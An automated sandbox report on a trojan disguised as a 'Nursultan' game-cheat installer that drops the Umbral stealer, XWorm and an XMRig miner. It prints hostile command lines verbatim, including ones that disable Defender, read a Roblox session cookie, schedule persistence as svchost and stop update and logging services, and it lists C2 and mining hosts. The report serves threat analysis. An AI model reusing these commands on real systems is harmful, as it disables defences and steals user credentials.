Analysis Overview
SHA256
98d19ece6f9d50124465ab6c1eef845659aada6c62d3e32a2b75b487cf4efdda
Threat Level: Known bad
The file 6850a8c541b310a2f4a5cd88352856a3.bin was found to be: Known bad.
Malicious Activity Summary
Detect Umbral payload
Umbral
Detect Xworm Payload
xmrig
Xworm
XMRig Miner payload
Stops running service(s)
Command and Scripting Interpreter: PowerShell
Creates new service(s)
Drops file in Drivers directory
Reads user/profile data of web browsers
Executes dropped EXE
.NET Reactor proctector
UPX packed file
Checks computer location settings
Power Settings
Adds Run key to start application
Looks up external IP address via web service
Legitimate hosting services abused for malware hosting/C2
Launches sc.exe
Enumerates physical storage devices
Unsigned PE
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Runs ping.exe
Views/modifies file attributes
Modifies registry class
Detects videocard installed
Scheduled Task/Job: Scheduled Task
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-07-01 02:04
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-07-01 02:04
Reported
2024-07-01 02:06
Platform
win7-20240508-en
Max time kernel
2s
Max time network
149s
Command Line
Signatures
Detect Umbral payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Umbral
Xworm
xmrig
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Creates new service(s)
Stops running service(s)
.NET Reactor proctector
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Power Settings
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Enumerates physical storage devices
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2164 wrote to memory of 2272 | N/A | C:\Users\Admin\AppData\Local\Temp\87fdd3337325634e35611a0cf9a9a4de31d4630dada6eeea83f261be5fbcaa95.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2164 wrote to memory of 2272 | N/A | C:\Users\Admin\AppData\Local\Temp\87fdd3337325634e35611a0cf9a9a4de31d4630dada6eeea83f261be5fbcaa95.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2164 wrote to memory of 2272 | N/A | C:\Users\Admin\AppData\Local\Temp\87fdd3337325634e35611a0cf9a9a4de31d4630dada6eeea83f261be5fbcaa95.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\87fdd3337325634e35611a0cf9a9a4de31d4630dada6eeea83f261be5fbcaa95.exe
"C:\Users\Admin\AppData\Local\Temp\87fdd3337325634e35611a0cf9a9a4de31d4630dada6eeea83f261be5fbcaa95.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cls
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
C:\Windows\system32\attrib.exe
"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe'
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" os get Caption
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" computersystem get totalphysicalmemory
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'MSBuild.exe'
C:\Windows\System32\Wbem\wmic.exe
"wmic" path win32_VideoController get name
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svchost.exe'
C:\Windows\system32\cmd.exe
"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe" && pause
C:\Windows\system32\PING.EXE
ping localhost
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\svchost.exe"
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "XMRKNZQC"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "XMRKNZQC" binpath= "C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe" start= "auto"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "XMRKNZQC"
C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe
C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe
C:\Windows\system32\svchost.exe
svchost.exe
C:\Windows\system32\taskeng.exe
taskeng.exe {E3AD2D07-DE2F-4A6D-92F1-B00B34649A3A} S-1-5-21-3691908287-3775019229-3534252667-1000:UOTHCPHQ\Admin:Interactive:[1]
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.137.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | mine.bmpool.org | udp |
| RO | 5.252.178.30:6004 | mine.bmpool.org | tcp |
| US | 8.8.8.8:53 | unknown-sunglasses.gl.at.ply.gg | udp |
| US | 147.185.221.20:28223 | unknown-sunglasses.gl.at.ply.gg | tcp |
| RO | 5.252.178.30:6004 | mine.bmpool.org | tcp |
| RO | 5.252.178.30:6004 | mine.bmpool.org | tcp |
| RO | 5.252.178.30:6004 | mine.bmpool.org | tcp |
| RO | 5.252.178.30:6004 | mine.bmpool.org | tcp |
| RO | 5.252.178.30:6004 | mine.bmpool.org | tcp |
| RO | 5.252.178.30:6004 | mine.bmpool.org | tcp |
| RO | 5.252.178.30:6004 | mine.bmpool.org | tcp |
| RO | 5.252.178.30:6004 | mine.bmpool.org | tcp |
| RO | 5.252.178.30:6004 | mine.bmpool.org | tcp |
| US | 147.185.221.20:28223 | unknown-sunglasses.gl.at.ply.gg | tcp |
| RO | 5.252.178.30:6004 | mine.bmpool.org | tcp |
| RO | 5.252.178.30:6004 | mine.bmpool.org | tcp |
| RO | 5.252.178.30:6004 | mine.bmpool.org | tcp |
| RO | 5.252.178.30:6004 | mine.bmpool.org | tcp |
| RO | 5.252.178.30:6004 | mine.bmpool.org | tcp |
| RO | 5.252.178.30:6004 | mine.bmpool.org | tcp |
| US | 147.185.221.20:28223 | unknown-sunglasses.gl.at.ply.gg | tcp |
| RO | 5.252.178.30:6004 | mine.bmpool.org | tcp |
| RO | 5.252.178.30:6004 | mine.bmpool.org | tcp |
| RO | 5.252.178.30:6004 | mine.bmpool.org | tcp |
| RO | 5.252.178.30:6004 | mine.bmpool.org | tcp |
| RO | 5.252.178.30:6004 | mine.bmpool.org | tcp |
| US | 147.185.221.20:28223 | unknown-sunglasses.gl.at.ply.gg | tcp |
| RO | 5.252.178.30:6004 | mine.bmpool.org | tcp |
Files
memory/2164-0-0x000007FEF5193000-0x000007FEF5194000-memory.dmp
memory/2164-1-0x000000013FE50000-0x0000000140150000-memory.dmp
memory/2272-6-0x0000000002D90000-0x0000000002E10000-memory.dmp
memory/2272-8-0x0000000002720000-0x0000000002728000-memory.dmp
memory/2272-7-0x000000001B6A0000-0x000000001B982000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\WBQGIKRMSH1GXMZEJG8S.temp
| MD5 | 171e4596826b2ad10e319469ecb1b8cf |
| SHA1 | 2e423d08e9e4b88dc34f9753b69e86f294f9e28d |
| SHA256 | 811d2032058427b5847c128645a6928932213596163288fd88dcfb05e2fb9438 |
| SHA512 | 474d3efb94f35ed851fc5a9d9c7b94c71dd4371dd4d6980de86d32aec4c6c5d56049787cae365b73d40b7a9e2a3df10992271903e13b23fbc4b4be607d49cd59 |
memory/2632-23-0x0000000001D10000-0x0000000001D18000-memory.dmp
memory/2632-22-0x000000001B690000-0x000000001B972000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
| MD5 | a1d8db2a1ff742bc73dd5617083f5fde |
| SHA1 | 957b182d82efb40a36099dd886ad581977880838 |
| SHA256 | d715e599815190df86069fae7220db64b5999207f77fb6e41cfe318d34c7399a |
| SHA512 | 0c5407f5707e5f2808cf1d85d71815ca67d45edc8bd8a83cc424dc927afcbad6ced5a826fff81549e5684ca0ece039513c3351ce7bf231e37885f7ed04dc513f |
memory/2424-29-0x00000000002F0000-0x0000000000330000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
| MD5 | f0b33cc162bfd36a995b8c90cd8ebff1 |
| SHA1 | ca1ddef08d47fc15a44a2d651b61e3decce8ebc6 |
| SHA256 | 6363305dc75b8bf7aa2a8b31b0b0f38022fb0139f809ecba42e5cfe7530830e0 |
| SHA512 | 1426cd246662adfd9aba4434586dc3bd54d31d395d9fafdcb15e785461a466567bff62e85085c36043cca047f951a96e5fc359c5cbf1000ff3121bba6b2905d0 |
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
| MD5 | c137c5f5287d73a94d55bc18df238303 |
| SHA1 | 95b4b01775bea14feaaa462c98d969eb81696d2c |
| SHA256 | d294856177658df0159cfe937e5ea95a8ee8a2ca85754d897aea3bb5d0d962c0 |
| SHA512 | ba595d185ae98152658ce95964fd6bcce7e970896b0b1c674a142d126cf0433094debcd25527d9b4f5a6568cc5a8a42aeaef536166748eea3973f8b694564aa5 |
memory/1856-47-0x0000000001360000-0x0000000001548000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
| MD5 | 0df0a039309525fd27e1b5e056c92b6a |
| SHA1 | 7551c27a9123cb56c4218647966a753794ac2961 |
| SHA256 | a29379238f93fa6301dd390e635b0c1f53d9197c68adc0f00cbc52bb4311a23f |
| SHA512 | 2c00ea216368e254167bd5f2562cbc93953b9c4756765f4504aaae7e9dc45e5584fef1ddb174b651a9a090c7217424e5b80dec58f6f2493c54704f46c35fede6 |
memory/1880-61-0x0000000000400000-0x0000000000412000-memory.dmp
memory/1880-60-0x0000000000400000-0x0000000000412000-memory.dmp
memory/1880-59-0x0000000000400000-0x0000000000412000-memory.dmp
memory/1880-58-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp
memory/1880-56-0x0000000000400000-0x0000000000412000-memory.dmp
memory/1880-54-0x0000000000400000-0x0000000000412000-memory.dmp
memory/1880-52-0x0000000000400000-0x0000000000412000-memory.dmp
memory/1880-51-0x0000000000400000-0x0000000000412000-memory.dmp
memory/1856-49-0x0000000005A20000-0x0000000005AD6000-memory.dmp
memory/1752-68-0x0000000001D30000-0x0000000001D38000-memory.dmp
memory/1752-67-0x000000001B6D0000-0x000000001B9B2000-memory.dmp
memory/1584-74-0x000000001B620000-0x000000001B902000-memory.dmp
memory/1584-75-0x0000000001DF0000-0x0000000001DF8000-memory.dmp
memory/476-94-0x0000000001E90000-0x0000000001E98000-memory.dmp
\??\PIPE\srvsvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | 4a5887281298574ed5243753fd6f3d15 |
| SHA1 | be4f930dc2b31fece3e8b5afdbdeca328e7d1439 |
| SHA256 | 40a090399f5e0b09f05f55a694ec2c35b6786dd261dfd4e2d8b1d8650f25a0c3 |
| SHA512 | 76945f3617e6b63ae39cc1a4e5be75dff0cad15b33d3d4ac7c5d7fb15c3d80e62d391a3ddea00eed629ae1cf2fb7cad032248d5b1ba0b28fbfb027ecd43defb9 |
memory/2988-108-0x0000000002790000-0x0000000002798000-memory.dmp
memory/2988-107-0x000000001B6C0000-0x000000001B9A2000-memory.dmp
\Users\Admin\AppData\Roaming\svchost.exe
| MD5 | 9af17c8393f0970ee5136bd3ffa27001 |
| SHA1 | 4b285b72c1a11285a25f31f2597e090da6bbc049 |
| SHA256 | 71d6a7a3fe5f8dc878cd5bdeca0e09177efb85c01e9a8a10a95262cabefaa019 |
| SHA512 | b90f7de7d5ce72dccb264c7ba609e173c529b9d99ed9a63f88632bc58b1a994bbb727365f519c73b979f8918bd6de3c39a9f0347eb3a4bccdce4b2772a6516a3 |
memory/3032-138-0x0000000001D40000-0x0000000001D48000-memory.dmp
memory/3032-137-0x000000001B580000-0x000000001B862000-memory.dmp
memory/2292-144-0x0000000019F60000-0x000000001A242000-memory.dmp
memory/2292-145-0x0000000000A20000-0x0000000000A28000-memory.dmp
memory/2444-157-0x0000000140000000-0x0000000140848000-memory.dmp
memory/2444-166-0x0000000140000000-0x0000000140848000-memory.dmp
memory/2444-167-0x0000000140000000-0x0000000140848000-memory.dmp
memory/2444-165-0x0000000140000000-0x0000000140848000-memory.dmp
memory/2444-163-0x0000000140000000-0x0000000140848000-memory.dmp
memory/2444-164-0x0000000140000000-0x0000000140848000-memory.dmp
memory/2444-161-0x0000000140000000-0x0000000140848000-memory.dmp
memory/2444-162-0x00000000001B0000-0x00000000001D0000-memory.dmp
memory/2444-160-0x0000000140000000-0x0000000140848000-memory.dmp
memory/2444-159-0x0000000140000000-0x0000000140848000-memory.dmp
memory/2444-155-0x0000000140000000-0x0000000140848000-memory.dmp
memory/2444-158-0x0000000140000000-0x0000000140848000-memory.dmp
memory/2444-156-0x0000000140000000-0x0000000140848000-memory.dmp
memory/1656-153-0x0000000140000000-0x000000014000E000-memory.dmp
memory/1656-149-0x0000000140000000-0x000000014000E000-memory.dmp
memory/1656-148-0x0000000140000000-0x000000014000E000-memory.dmp
memory/1656-147-0x0000000140000000-0x000000014000E000-memory.dmp
memory/1656-146-0x0000000140000000-0x000000014000E000-memory.dmp
memory/1656-150-0x0000000140000000-0x000000014000E000-memory.dmp
memory/2976-170-0x0000000000C70000-0x0000000000CB0000-memory.dmp
memory/2616-173-0x0000000000FA0000-0x0000000000FE0000-memory.dmp
memory/2444-174-0x0000000140000000-0x0000000140848000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-07-01 02:04
Reported
2024-07-01 02:06
Platform
win10v2004-20240611-en
Max time kernel
13s
Max time network
153s
Command Line
Signatures
Detect Umbral payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Umbral
Xworm
xmrig
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Creates new service(s)
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe | N/A |
Stops running service(s)
.NET Reactor proctector
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\87fdd3337325634e35611a0cf9a9a4de31d4630dada6eeea83f261be5fbcaa95.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Nursultan.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe | N/A |
Reads user/profile data of web browsers
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Nursultan Setup = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan Setup.exe" | C:\Users\Admin\AppData\Local\Temp\87fdd3337325634e35611a0cf9a9a4de31d4630dada6eeea83f261be5fbcaa95.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Запустить Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Запустить Nursultan.exe" | C:\Users\Admin\AppData\Local\Temp\87fdd3337325634e35611a0cf9a9a4de31d4630dada6eeea83f261be5fbcaa95.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan.exe" | C:\Users\Admin\AppData\Local\Temp\87fdd3337325634e35611a0cf9a9a4de31d4630dada6eeea83f261be5fbcaa95.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Power Settings
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
